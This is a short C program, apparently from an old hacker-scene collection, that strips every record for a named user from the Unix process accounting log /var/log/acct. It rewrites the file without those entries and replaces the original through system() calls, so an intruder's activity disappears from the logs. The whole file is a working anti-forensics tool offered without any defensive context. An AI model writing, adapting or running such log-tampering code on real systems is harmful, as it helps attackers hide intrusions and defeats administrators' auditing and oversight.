/*
   Xytaxehedron v0.1
   "The Xytaxehedron held to the stars... the incantation uttered with eager
   tongues... (What long-shackled powers of the elder dark have our conjurings
   loosed?)"
   Startfire burning upon the ice-veiled throne of ultima thule, Bal Sagoth.
   coded by bELFaghor
*/

#include <stdio.h>
#include <unistd.h>
#include <sys/acct.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <pwd.h>

#define ACF "/var/log/acct"

void main(int argc, char *argv[]) {
        int fdin, fdout;
        struct acct akt;
        struct passwd *p;

        if(argc != 2) {
                printf("ERR. syntax:\t%s <user>.\n", argv[0]);
                exit(1);
                }

        if((p = getpwnam(argv[1])) == NULL) {
                perror("getpwnam");
                exit(2);
                }

        if((fdin = open(ACF, O_RDONLY)) < 0) {
                perror("open acct");
                exit(3);
                }

        if((fdout = open("fackt.tmp", O_WRONLY|O_CREAT|O_TRUNC, S_IRUSR|S_IWUSR)) < 0) {
                perror("open fackt.tmp");
                exit(4);
        }

        while(read(fdin, &akt, sizeof(struct acct)) > 0) {
                if(akt.ac_uid != p->pw_uid) {
                        write(fdout, &akt, sizeof(struct acct));
                        }
        }
        close(fdin);
        close(fdout);

        system("/bin/mv fackt.tmp /var/log/acct");
        system("/bin/chmod 600 /var/log/acct");
        printf("puff.\n");
}
